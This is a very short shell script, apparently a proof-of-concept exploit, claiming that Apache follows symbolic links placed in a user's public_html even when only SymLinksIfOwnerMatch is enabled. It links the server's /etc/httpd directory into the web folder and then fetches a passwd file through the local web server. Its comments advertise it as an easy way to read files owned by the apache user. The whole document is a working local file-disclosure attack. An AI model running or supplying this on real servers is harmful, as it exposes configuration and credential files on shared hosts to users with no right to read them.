#!/bin/sh ## Apache follows symbolic links referenced by public_html! ## Even when SymLinksifOwnerMatch is set and FollowSymLinks is not! ## A super-easy way to gain read access on files owned by the apache user! ln -s /etc/httpd ~/public_html lynx http://localhost/~duper/passwd